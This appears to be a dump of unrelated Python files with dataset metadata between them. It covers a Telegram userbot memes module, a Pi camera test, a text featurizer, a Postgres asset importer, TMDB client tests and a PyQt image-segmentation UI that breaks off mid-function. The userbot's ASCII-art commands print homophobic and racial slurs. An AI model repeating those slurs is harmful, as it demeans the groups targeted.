"`\n█▄────▀████──████────█████──██──█`"
"`\n█▀▀██──████──████──███████──██──█`"
"`\n█──────████──████──███████──────█`"
"`\n██▄▄▄▄█████▄▄████▄▄████████▄▄▄▄██`"
"`\n█████████████████████████████████`")
@register(outgoing=True, pattern="^.gtfo$")
async def gtfo(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n███████████████████████████████ `"
"`\n█▀▀▀▀▀▀▀█▀▀▀▀▀▀█▀▀▀▀▀▀▀█▀▀▀▀▀▀█ `"
"`\n█───────█──────█───────█──────█ `"
"`\n█──███──███──███──███▄▄█──██──█ `"
"`\n█──███▄▄███──███─────███──██──█ `"
"`\n█──██───███──███──██████──██──█ `"
"`\n█──▀▀▀──███──███──██████──────█ `"
"`\n█▄▄▄▄▄▄▄███▄▄███▄▄██████▄▄▄▄▄▄█ `"
"`\n███████████████████████████████ `")
@register(outgoing=True, pattern="^.nih$")
async def nih(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n(\_/)`"
"`\n( •_•)`"
"\n >🌹 *ini buat kamu"
"`\n `"
"`\n(\_/)`"
"`\n( •_•)`"
"`\n🌹<\ *tapi boong`")
@register(outgoing=True, pattern="^.fag$")
async def gtfo(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n█████████`"
"`\n█▄█████▄█`"
"`\n█▼▼▼▼▼`"
"`\n█ STFU FAGGOT'S`"
"`\n█▲▲▲▲▲`"
"`\n█████████`"
"`\n ██ ██`")
@register(outgoing=True, pattern="^.taco$")
async def taco(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("\n{\__/}"
"\n(●_●)"
"\n( >🌮 Want a taco?")
@register(outgoing=True, pattern="^.paw$")
async def paw(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`(=ↀωↀ=)")
@register(outgoing=True, pattern="^.tf$")
async def tf(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("(̿▀̿ ̿Ĺ̯̿̿▀̿ ̿)̄ ")
@register(outgoing=True, pattern="^.gey$")
async def gey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈┈┈╭━━━━━╮┈┈┈┈┈\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`"
"`\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`"
"`\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\n┈┈┈┃┊┃╰━━┫┈NIGGA U GEY`"
"\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈")
@register(outgoing=True, pattern="^.gay$")
async def gey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈┈┈╭━━━━━╮┈┈┈┈┈\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`"
"`\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`"
"`\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\n┈┈┈┃┊┃╰━━┫┈BAPAQ U GAY`"
"\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈")
@register(outgoing=True, pattern="^.bot$")
async def bot(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("` \n ╲╲╭━━━━╮ \n╭╮┃▆┈┈▆┃╭╮ \n┃╰┫▽▽▽┣╯┃ \n╰━┫△△△┣━╯`"
"`\n╲╲┃┈┈┈┈┃ \n╲╲┃┈┏┓┈┃ `")
@register(outgoing=True, pattern="^.hey$")
async def hey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("\n┈┈┈╱▔▔▔▔╲┈╭━━━━━\n┈┈▕▂▂▂▂▂▂▏┃HEY!┊😀`"
"`\n┈┈▕▔▇▔▔┳▔▏╰┳╮HEY!┊\n┈┈▕╭━╰╯━╮▏━╯╰━━━\n╱▔▔▏▅▅▅▅▕▔▔╲┈┈┈┈`"
"`\n▏┈┈╲▂▂▂▂╱┈┈┈▏┈┈┈`")
@register(outgoing=True, pattern="^.nou$")
async def nou(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈╭╮╭╮\n┈┃┃┃┃\n╭┻┗┻┗╮`"
"`\n┃┈▋┈▋┃\n┃┈╭▋━╮━╮\n┃┈┈╭╰╯╰╯╮`"
"`\n┫┈┈ NoU\n┃┈╰╰━━━━╯`"
"`\n┗━━┻━┛`")
CMD_HELP.update({
"memes":
".cowsay\
\nUsage: cow which says things.\
\n\n:/\
\nUsage: Check yourself ;)\
\n\n-_-\
\nUsage: Ok...\
\n\n;_;\
\nUsage: Like `-_-` but crying.\
\n\n.cp\
\nUsage: Copypasta the famous meme\
\n\n.vapor\
\nUsage: Vaporize everything!\
\n\n.str\
\nUsage: Stretch it.\
\n\n.10iq\
\nUsage: You retard !!\
\n\n.zal\
\nUsage: Invoke the feeling of chaos.\
\n\nOof\
\nUsage: Ooooof\
\n\n.fp\
\nUsage: Facepalm :P\
\n\n.moon\
\nUsage: kensar moon animation.\
\n\n.clock\
\nUsage: kensar clock animation.\
\n\n.hi\
\nUsage: Greet everyone!\
\n\n.coinflip <heads/tails>\
\nUsage: Flip a coin !!\
\n\n.owo\
\nUsage: UwU\
\n\n.react\
\nUsage: Make your userbot react to everything.\
\n\n.slap\
\nUsage: reply to slap them with random objects !!\
\n\n.cry\
\nUsage: y u du dis, i cri.\
\n\n.shg\
\nUsage: Shrug at it !!\
\n\n.run\
\nUsage: Let Me Run, run, RUNNN!\
\n\n.chase\
\nUsage: You better start running\
\n\n.metoo\
\nUsage: Haha yes\
\n\n.mock\
\nUsage: Do it and find the real fun.\
\n\n.clap\
\nUsage: Praise people!\
\n\n.f <emoji/character>\
\nUsage: Pay Respects.\
\n\n.bt\
\nUsage: Believe me, you will find this useful.\
\n\n.type\
\nUsage: Just a small command to make your keyboard become a typewriter!\
\n\n.lfy <query>\
\nUsage: Let me Google that for you real quick !!\
\n\n.decide [Alternates: (.yes, .no, .maybe)]\
\nUsage: Make a quick decision.\
\n\n.scam <action> <time>\
\n[Available Actions: (typing, contact, game, location, voice, round, video, photo, document, cancel)]\
\nUsage: Create fake chat actions, for fun. (Default action: typing)\
\n\n\nThanks to 🅱️ottom🅱️ext🅱️ot (@NotAMemeBot) for some of these."
})
| 28.581738
| 157
| 0.479054
|
d4d5a80e8050a8b63dac79712990961e7b7108d8
| 975
|
py
|
Python
|
tests/remote/unit/test_picamera.py
|
git-akihakune/pilapse
|
2e2cb99e074b5b234c3d8816d421e3d24909e2e6
|
[
"MIT"
] | null | null | null |
tests/remote/unit/test_picamera.py
|
git-akihakune/pilapse
|
2e2cb99e074b5b234c3d8816d421e3d24909e2e6
|
[
"MIT"
] | null | null | null |
tests/remote/unit/test_picamera.py
|
git-akihakune/pilapse
|
2e2cb99e074b5b234c3d8816d421e3d24909e2e6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from picamera.camera import PiCamera
import pytest
def take_picture(camera, workdir:str, image_name:str, res_x:int, res_y:int):
from time import sleep
from os import path
camera.resolution = (res_x, res_y)
# camera warm-up time
sleep(2)
camera.capture(path.join(workdir, image_name))
@pytest.mark.order(1)
def test_camera(numberOfTakes:int = 6, res_x:int = 3280, res_y:int = 2464):
import os
from shutil import rmtree
from picamera import PiCamera
# Make sure the previous test run does not
# affect the later ones
if os.path.isdir('/tmp/pilapse-test'):
rmtree('/tmp/pilapse-test', ignore_errors=True)
os.mkdir('/tmp/pilapse-test')
tempdir = '/tmp/pilapse-test'
camera = PiCamera()
# take several pictures to test multiple images
# taking ability
for picNum in range(numberOfTakes):
take_picture(camera, tempdir, str(picNum) + '.jpg', res_x, res_y)
| 25.657895
| 76
| 0.684103
|
7b3773c7d7a80e97e3315028be84be6042b7012e
| 6,458
|
py
|
Python
|
athena/data/text_featurizer.py
|
leixiaoning/athena-2
|
826c3bda241afd388e156bbefcd6ca2e8d88afc9
|
[
"Apache-2.0"
] | 1
|
2021-05-20T03:09:32.000Z
|
2021-05-20T03:09:32.000Z
|
athena/data/text_featurizer.py
|
leixiaoning/athena-2
|
826c3bda241afd388e156bbefcd6ca2e8d88afc9
|
[
"Apache-2.0"
] | null | null | null |
athena/data/text_featurizer.py
|
leixiaoning/athena-2
|
826c3bda241afd388e156bbefcd6ca2e8d88afc9
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright (C) 2019 ATHENA AUTHORS; Xiangang Li; Shuaijiang Zhao
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
""" Text featurizer """
import os
import re
import warnings
from collections import defaultdict
import sentencepiece as spm
import tensorflow as tf
from ..utils.hparam import register_and_parse_hparams
class Vocabulary:
""" Vocabulary
Interface::
decode: Convert a list of ids to a sentence, with space inserted
encode: Convert a sentence to a list of ids, with special tokens added
"""
def __init__(self, vocab_file):
"""Initialize vocabulary.
Args:
vocab_file: Vocabulary file name.
"""
super().__init__()
if vocab_file is not None:
self.load_model(vocab_file)
def load_model(self, vocab_file):
""" load model"""
if vocab_file is None or not os.path.exists(vocab_file):
warnings.warn(
"[Warning] the vocab {} is not exists, make sure you are "
"generating it, otherwise you should check it!".format(vocab_file)
)
self.stoi = defaultdict(self._default_unk_index)
self.itos = defaultdict(self._default_unk_symbol)
self.space, self.unk = "<space>", "<unk>"
self.unk_index, self.max_index = 0, 0
with open(vocab_file, "r", encoding="utf-8") as vocab:
for line in vocab:
if line.startswith("#"):
continue
word, index = line.split()
index = int(index)
self.itos[index] = word
self.stoi[word] = index
if word == self.unk:
self.unk_index = index
if index > self.max_index:
self.max_index = index
# special deal with the space maybe used in English datasets
if self.stoi[self.space] != self.unk_index:
self.stoi[" "] = self.stoi[self.space]
self.itos[self.stoi[self.space]] = " "
def _default_unk_index(self):
return self.unk_index
def _default_unk_symbol(self):
return self.unk
def __len__(self):
return self.max_index + 1
def decode(self, ids):
"""Convert a list of ids to a sentence."""
return "".join([self.itos[id] for id in ids])
def encode(self, sentence):
"""Convert a sentence to a list of ids, with special tokens added."""
return [self.stoi[token.lower()] for token in list(sentence.strip())]
def __call__(self, inputs):
if isinstance(inputs, list):
return self.decode(inputs)
elif isinstance(inputs, int):
return self.itos[inputs]
elif isinstance(inputs, str):
return self.encode(inputs)
else:
raise ValueError("unsupported input")
class SentencePieceFeaturizer:
""" TODO: docstring """
def __init__(self, spm_file):
self.unk_index = 0
self.sp = spm.SentencePieceProcessor()
if spm_file is not None:
self.sp.Load(spm_file)
def load_model(self, model_file):
""" load model """
self.sp.Load(model_file)
def __len__(self):
return self.sp.GetPieceSize()
def encode(self, sentence):
"""Convert a sentence to a list of ids by sentence piece model"""
sentence = sentence.upper()
return [self.sp.EncodeAsIds(sentence)]
def decode(self, ids):
"""Conver a list of ids to a sentence"""
return self.sp.DecodeIds(ids)
class TextTokenizer:
""" Text Tokenizer """
def __init__(self, text=None):
self.tokenizer = tf.keras.preprocessing.text.Tokenizer()
self.text = text
if text is not None:
self.load_model(text)
def load_model(self, text):
""" load model """
self.tokenizer.fit_on_texts(text)
def __len__(self):
return len(self.tokenizer.word_index) + 1
def encode(self, texts):
"""Convert a sentence to a list of ids, with special tokens added."""
return self.tokenizer.texts_to_sequences([texts])[0]
def decode(self, sequences):
"""Conver a list of ids to a sentence"""
return self.tokenizer.sequences_to_texts(sequences[0])
class TextFeaturizer:
""" The main text featurizer interface """
supported_model = {
"vocab": Vocabulary,
"spm": SentencePieceFeaturizer,
"text": TextTokenizer
}
default_config = {
"type": "text",
"model": None,
}
#pylint: disable=dangerous-default-value, no-member
def __init__(self, config=None):
self.p = register_and_parse_hparams(self.default_config, config)
self.model = self.supported_model[self.p.type](self.p.model)
self.punct_tokens = r"'{}[]\|`~@#$%^&*()"
self.punct_tokens += r"_+,。、‘’“”《》?:;【】——~!@"
self.punct_tokens += r"¥%……&(),.?<>:;\[\]|`\!@#$%^&()+?\"/_-"
def load_model(self, model_file):
""" load model """
self.model.load_model(model_file)
@property
def model_type(self):
""" the model type """
return self.p.type
def delete_punct(self, tokens):
""" delete punctuation tokens """
return re.sub("[{}]".format(self.punct_tokens), "", tokens)
def __len__(self):
return len(self.model)
def encode(self, texts):
"""Convert a sentence to a list of ids, with special tokens added."""
return self.model.encode(texts)
def decode(self, sequences):
"""Conver a list of ids to a sentence"""
return self.model.decode(sequences)
@property
def unk_index(self):
""" return the unk index """
if self.p.type == "vocab":
return self.model.unk_index
return -1
| 31.970297
| 82
| 0.598328
|
c7cc5c9cdfcfbf14718205c8571bc6009b6cb42f
| 393
|
py
|
Python
|
preprocess/003_aggregation/04/python_awesome.py
|
liyiliuxingyu/Data-preprocessing-goes-from-getting-started-to-real-world
|
c83fc7b92b52bc106d9a803a6fec24d6470889c3
|
[
"BSD-3-Clause"
] | null | null | null |
preprocess/003_aggregation/04/python_awesome.py
|
liyiliuxingyu/Data-preprocessing-goes-from-getting-started-to-real-world
|
c83fc7b92b52bc106d9a803a6fec24d6470889c3
|
[
"BSD-3-Clause"
] | null | null | null |
preprocess/003_aggregation/04/python_awesome.py
|
liyiliuxingyu/Data-preprocessing-goes-from-getting-started-to-real-world
|
c83fc7b92b52bc106d9a803a6fec24d6470889c3
|
[
"BSD-3-Clause"
] | null | null | null |
from preprocess.load_data.data_loader import load_hotel_reserve
customer_tb, hotel_tb, reserve_tb = load_hotel_reserve()
# 本书刊登内容如下
# 对total_price列应用var和std函数,计算方差和标准差
result = reserve_tb \
.groupby('hotel_id') \
.agg({'total_price': ['var', 'std']}).reset_index()
result.columns = ['hotel_id', 'price_var', 'price_std']
# 由于当数据条数为1时方差和标准差会变为na,所以这里将其替换为0
result.fillna(0, inplace=True)
| 30.230769
| 63
| 0.765903
|
92d227203915b7af458e29d6fcab2b0b2b5f9838
| 4,304
|
py
|
Python
|
postgres/import_assets.py
|
VinChain/vinchain-python-api-backend-
|
f18bbd78d27d23eea744f1fb9dea90a1b8a30396
|
[
"MIT"
] | 1
|
2021-03-17T00:11:02.000Z
|
2021-03-17T00:11:02.000Z
|
postgres/import_assets.py
|
VinChain/vinchain-python-api-backend
|
f18bbd78d27d23eea744f1fb9dea90a1b8a30396
|
[
"MIT"
] | null | null | null |
postgres/import_assets.py
|
VinChain/vinchain-python-api-backend
|
f18bbd78d27d23eea744f1fb9dea90a1b8a30396
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
import json
import psycopg2
from websocket import create_connection
import api
import config
ws = create_connection(config.WEBSOCKET_URL)
con = psycopg2.connect(**config.POSTGRES)
cur = con.cursor()
query = "TRUNCATE assets"
cur.execute(query)
query = "ALTER SEQUENCE assets_id_seq RESTART WITH 1;"
cur.execute(query)
# alter sequence of the ops once a day here
query = "DELETE FROM ops WHERE oid NOT IN (SELECT oid FROM ops ORDER BY oid DESC LIMIT 10);"
cur.execute(query)
for x in range(0, 10):
query = "UPDATE ops set oid=%s WHERE oid IN (SELECT oid FROM ops ORDER BY oid LIMIT 1 OFFSET %s);"
cur.execute(query, (x+1, x))
query = "ALTER SEQUENCE ops_oid_seq RESTART WITH 11;"
cur.execute(query)
con.commit()
if config.TESTNET == 1:
core_symbol = config.CORE_ASSET_SYMBOL_TESTNET
else:
core_symbol = config.CORE_ASSET_SYMBOL
all_assets = []
ws.send('{"id":1, "method":"call", "params":[0,"list_assets",["AAAAA", 100]]}')
result = ws.recv()
j = json.loads(result)
all_assets.append(j);
len_result = len(j["result"])
print len_result
#print all_assets
while len_result == 100:
ws.send('{"id":1, "method":"call", "params":[0,"list_assets",["'+j["result"][99]["symbol"]+'", 100]]}')
result = ws.recv()
j = json.loads(result)
len_result = len(j["result"])
all_assets.append(j);
for x in range(0, len(all_assets)):
size = len(all_assets[x]["result"])
print size
for i in range(0, size):
symbol = all_assets[x]["result"][i]["symbol"]
asset_id = all_assets[x]["result"][i]["id"]
precision = 5
try:
data3 = api._get_asset(asset_id)
current_supply = data3[0]["current_supply"]
precision = data3[0]["precision"]
# print current_supply
except:
price = 0
continue
try:
holders = api._get_asset_holders_count(asset_id)
# print holders
except:
holders = 0
continue
if symbol == core_symbol:
type_ = "Core Token"
elif all_assets[x]["result"][i]["issuer"] == "1.2.0":
type_ = "SmartCoin"
else:
type_ = "User Issued"
#print all_assets[x]["result"][i]
try:
data = api._get_volume(core_symbol, symbol)
except:
continue
#print symbol
#print data["quote_volume"]
try:
data2 = api._get_ticker(core_symbol, symbol)
price = data2["latest"]
#print price
if str(price) == 'inf':
continue
# exit
#print price
except:
price = 0
continue
mcap = int(current_supply) * float(price)
query = "INSERT INTO assets (aname, aid, price, volume, mcap, type, current_supply, holders, wallettype, precision) VALUES({})".format(', '.join(('%s',)*10))
print(symbol)
cur.execute(query, (symbol, asset_id, price, data['base_volume'], str(mcap), type_, str(current_supply), str(holders), '', str(precision)))
con.commit()
# with updated volume, add stats
query = "select sum(volume) from assets WHERE aname!='BTS'"
cur.execute(query)
results = cur.fetchone()
volume = results[0]
if volume is None:
volume = 0
query = "select sum(mcap) from assets"
cur.execute(query)
results = cur.fetchone()
market_cap = results[0]
query = "INSERT INTO stats (type, value, date) VALUES('volume_bts', %s, NOW())"
print query
cur.execute(query, (str(int(round(volume))),))
con.commit()
"""query = "INSERT INTO stats (type, value, date) VALUES('market_cap_bts', '"+str(int(round(market_cap)))+"', NOW())" # out of range for bigint, fix.
print query
cur.execute(query)
con.commit()
"""
# insert core token manually
data3 = api._get_asset(config.CORE_ASSET_ID)
current_supply = data3[0]["current_supply"]
holders = api._get_asset_holders_count(config.CORE_ASSET_ID)
mcap = int(current_supply)
query = "INSERT INTO assets (aname, aid, price, volume, mcap, type, current_supply, holders, wallettype) VALUES('BTS', '1.3.0', '1', %s, %s, %s, %s, %s, %s)"
cur.execute(query, (str(volume), str(mcap), 'Core Token', str(current_supply), str(holders), ''))
con.commit()
cur.close()
con.close()
| 26.9
| 165
| 0.622212
|
4d87bd234e6cbfa3787b8375b2d98f02abc0b916
| 2,837
|
py
|
Python
|
tests/test_tmdb.py
|
SztMar/movies_catalogue
|
8140a37e916d9f67314aa679b46134e1794588e6
|
[
"MIT"
] | null | null | null |
tests/test_tmdb.py
|
SztMar/movies_catalogue
|
8140a37e916d9f67314aa679b46134e1794588e6
|
[
"MIT"
] | null | null | null |
tests/test_tmdb.py
|
SztMar/movies_catalogue
|
8140a37e916d9f67314aa679b46134e1794588e6
|
[
"MIT"
] | null | null | null |
import tmdb_client
from unittest.mock import Mock
import app
from app import app
import pytest
test_list = "top_rated"
def test_get_poster_url_uses_default_size():
# Przygotowanie danych
poster_api_path = "some-poster-path"
expected_default_size = 'w324'
# Wywołanie kodu, który testujemy
poster_url = tmdb_client.get_poster_url(poster_api_path=poster_api_path)
# Porównanie wyników
assert expected_default_size in poster_url
#assert poster_url == "https://image.tmdb.org/t/p/w324/some-poster-path"
def test_get_movies_list(monkeypatch):
# Lista, którą będzie zwracać przysłonięte "zapytanie do API"
mock_movies_list = ['Movie 1', 'Movie 2']
requests_mock = Mock()
# Wynik wywołania zapytania do API
response = requests_mock.return_value
# Przysłaniamy wynik wywołania metody .json()
response.json.return_value = mock_movies_list
monkeypatch.setattr("tmdb_client.requests.get", requests_mock)
movies_list = tmdb_client.get_movies_list(list_type="popular")
assert movies_list == mock_movies_list
def test_get_single_movie_id(monkeypatch):
mock_movie_id = 1
requests_mock = Mock()
response = requests_mock.return_value
response.json.return_value = mock_movie_id
monkeypatch.setattr("tmdb_client.requests.get", requests_mock)
movie_id = tmdb_client.get_single_movie(movie_id=1)
assert movie_id == mock_movie_id
def test_get_movie_images_id(monkeypatch):
mock_movie_id = 1
requests_mock = Mock()
response = requests_mock.return_value
response.json.return_value = mock_movie_id
monkeypatch.setattr("tmdb_client.requests.get", requests_mock)
movie_id = tmdb_client.get_movie_images(movie_id=1)
assert movie_id == mock_movie_id
def test_get_single_movie_cast_id(monkeypatch):
mock_movie_id = 1
requests_mock = Mock()
response = requests_mock.return_value
response.json.return_value = mock_movie_id
monkeypatch.setattr("tmdb_client.requests.get", requests_mock)
movie_id = tmdb_client.get_single_movie(movie_id=1)
assert movie_id == mock_movie_id
def test_get_movies_by_default_movies():
# Przygotowanie danych
how_many = 1
adult = False
# Wywołanie kodu, który testujemy
data = tmdb_client.get_movies(how_many= how_many, list_type="upcoming")
assert data[0]['adult'] == adult
@pytest.mark.parametrize("test_input",['now_playing', 'popular','top_rated', 'upcoming'])
def test_homepage_movie_list(monkeypatch, test_input):
api_mock = Mock()
api_mock.return_value={'results': []}
monkeypatch.setattr("tmdb_client.call_tmdb_api", api_mock)
with app.test_client() as client:
print(test_input)
response = client.get(f'/?list_type={test_input}')
assert response.status_code == 200
api_mock.assert_called_once_with(f'movie/{test_input}')
| 31.876404
| 89
| 0.756433
|
f0e098d6f46b56d549a10aa011fbf225c44dbef7
| 26,718
|
py
|
Python
|
CutUI.py
|
jfzhang95/simple-labelme
|
e4a831e56924cde70ee1293dc53e1dd298025051
|
[
"MIT"
] | null | null | null |
CutUI.py
|
jfzhang95/simple-labelme
|
e4a831e56924cde70ee1293dc53e1dd298025051
|
[
"MIT"
] | null | null | null |
CutUI.py
|
jfzhang95/simple-labelme
|
e4a831e56924cde70ee1293dc53e1dd298025051
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import os
import numpy as np
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
import cv2
from GraphCut import GraphMaker
from PIL import Image
from DEXTR import utils
import torch
from collections import OrderedDict
from DEXTR import deeplab_resnet as resnet
from torch.nn.functional import upsample
from torch.autograd import Variable
from mypath import Path
class CutUI(QWidget):
def __init__(self, image_dir=None, result_dir=None, mode='dextr'):
super().__init__()
self.image_dir = image_dir
self.result_dir = result_dir
path = self.result_dir
if not os.path.exists(path):
os.mkdir(path)
file_list = os.listdir(self.image_dir)
self.images = file_list
self.image_name = self.images[0]
self.id = 0
self.lenths = len(file_list) - 1
self.mode = mode
self.gpu_id = -1
self.pad = 50
self.thres = 0.8
self.modelName = 'dextr_pascal-sbd'
self.image = cv2.imread(os.path.join(self.image_dir,self.image_name))
self.overlay = np.zeros_like(self.image)
self.segment_overlay = np.zeros_like(self.image)
self.temp_overlay = np.zeros_like(self.image)
self.extreme_points_ori = []
self.dextr_results = []
self.completed_image_list = []
self.seed_type = 1
self.seedStartX = 0
self.seedStartY = 0
self.seedReleaseX = 0
self.seedReleaseY = 0
self.IsEraser = False
self.IsAdd = False
self.flag = True
self.__InitUI()
if self.mode == 'graphcut':
print('Using GRAPH CUT')
self.graphcutButton.setStyleSheet("background-color:gray")
self.dextrButton.setStyleSheet("background-color:white")
elif self.mode == 'dextr':
print('Using DEXTR CUT')
self.graphcutButton.setStyleSheet("background-color:white")
self.dextrButton.setStyleSheet("background-color:gray")
def __InitUI(self):
self.graphcutButton = QPushButton("Graphcut")
self.graphcutButton.setStyleSheet("background-color:white")
self.graphcutButton.clicked.connect(self.on_graphcut)
self.dextrButton = QPushButton("DEXTR")
self.dextrButton.setStyleSheet("background-color:white")
self.dextrButton.clicked.connect(self.on_dextr)
segmentButton = QPushButton("Segmentation")
segmentButton.setStyleSheet("background-color:white")
segmentButton.clicked.connect(self.on_segment)
finishButton = QPushButton("Finish")
finishButton.setStyleSheet("background-color:white")
finishButton.clicked.connect(self.on_finish)
nextButton = QPushButton("Next")
nextButton.setStyleSheet("background-color:white")
nextButton.clicked.connect(self.on_next)
lastButton = QPushButton("Last")
lastButton.setStyleSheet("background-color:white")
lastButton.clicked.connect(self.on_last)
self.thinkness = QLineEdit("3")
self.thinkness.setStyleSheet("background-color:white")
self.thinkness.setMaximumWidth(30)
clearButton = QPushButton("Clear All")
clearButton.setStyleSheet("background-color:white")
clearButton.clicked.connect(self.on_clear)
self.eraserButton = QPushButton("Eraser")
self.eraserButton.setStyleSheet("background-color:white")
self.eraserButton.clicked.connect(self.on_eraser)
self.addButton = QPushButton("Add")
self.addButton.setStyleSheet("background-color:white")
self.addButton.clicked.connect(self.on_add)
hbox = QHBoxLayout()
hbox.addWidget(self.dextrButton)
hbox.addWidget(self.graphcutButton)
hbox.addWidget(segmentButton)
hbox.addWidget(self.addButton)
hbox.addWidget(self.eraserButton)
hbox.addWidget(clearButton)
hbox.addWidget(finishButton)
hbox.addWidget(lastButton)
hbox.addWidget(nextButton)
hbox.addWidget(self.thinkness)
hbox.addStretch(1)
self.seedLabel = QLabel()
self.seedLabel.mousePressEvent = self.mouse_down
self.seedLabel.mouseReleaseEvent = self.mouse_release
self.seedLabel.mouseMoveEvent = self.mouse_drag
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
imagebox = QHBoxLayout()
imagebox.addWidget(self.seedLabel)
vbox = QVBoxLayout()
vbox.addLayout(hbox)
vbox.addLayout(imagebox)
vbox.addStretch()
self.setLayout(vbox)
self.setWindowTitle('Segmentation')
self.show()
@staticmethod
def get_qimage(cvimage):
height, width, bytes_per_pix = cvimage.shape
bytes_per_line = width * bytes_per_pix
cv2.cvtColor(cvimage, cv2.COLOR_BGR2RGB, cvimage)
return QImage(cvimage.data, width, height, bytes_per_line, QImage.Format_RGB888)
def mouse_down(self, event):
thinkness = int(self.thinkness.text())
if event.button() == Qt.LeftButton:
self.seed_type = 1
elif event.button() == Qt.RightButton:
self.seed_type = 0
temp_overlay = self.get_image_with_overlay()
self.seedStartX = event.x()
self.seedStartY = event.y()
self.seedReleaseX = event.x()
self.seedReleaseY = event.y()
if self.mode == 'graphcut':
if not self.IsAdd and not self.IsEraser:
if self.seed_type == 1:
cv2.circle(temp_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2), (255, 255, 255),
int(thinkness / 2)) #
else:
cv2.circle(temp_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2), (0, 0, 255),
int(thinkness / 2))
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(temp_overlay)))
elif self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
print('You cannot wipe any pixels until you finish at least one segmentation!')
else:
cv2.circle(self.segment_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2), (0, 0, 0),
int(thinkness / 2))
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.IsAdd:
if len(np.unique(self.segment_overlay)) <= 1:
print('You cannot add any pixels until you finish at least one segmentation!')
else:
cv2.circle(self.segment_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2),
(255, 255, 255),
int(thinkness / 2))
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.mode == 'dextr':
if not self.IsAdd and not self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
if len(self.extreme_points_ori) < 4:
cv2.circle(self.overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2), (0, 255, 0),
4)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
self.extreme_points_ori.append((self.seedStartX, self.seedStartY))
else:
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay())))
print('You can only input 4 extreme points!')
else:
if len(self.extreme_points_ori) < 4:
cv2.circle(self.segment_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2),
(0, 255, 0),
4)
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
self.extreme_points_ori.append((self.seedStartX, self.seedStartY))
else:
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
print('You can only input 4 extreme points!')
elif self.IsEraser:
if len(np.unique(self.segment_overlay)) <= 1:
print('You cannot wipe any pixels until you finish at least one segmentation!')
else:
cv2.circle(self.segment_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2), (0, 0, 0),
int(thinkness / 2))
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
elif self.IsAdd:
if len(np.unique(self.segment_overlay)) <= 1:
print('You cannot add any pixels until you finish at least one segmentation!')
else:
cv2.circle(self.segment_overlay, (self.seedStartX, self.seedStartY), int(thinkness / 2),
(255, 255, 255),
int(thinkness / 2))
self.seedLabel.setPixmap(QPixmap.fromImage(
self.get_qimage(self.get_image_with_overlay(1))))
def mouse_drag(self, event):
thinkness = int(self.thinkness.text())
self.seedReleaseX = event.x()
self.seedReleaseY = event.y()
temp_overlay = self.get_image_with_overlay()
if self.mode == 'graphcut':
if not self.IsAdd and not self.IsEraser:
if self.seed_type == 1:
cv2.line(temp_overlay, (self.seedStartX, self.seedStartY), (self.seedReleaseX, self.seedReleaseY),
(255, 255, 255), thinkness)
else:
cv2.line(temp_overlay, (self.seedStartX, self.seedStartY), (self.seedReleaseX, self.seedReleaseY),
(0, 0, 255), thinkness)
self.seedLabel.setPixmap(QPixmap.fromImage(
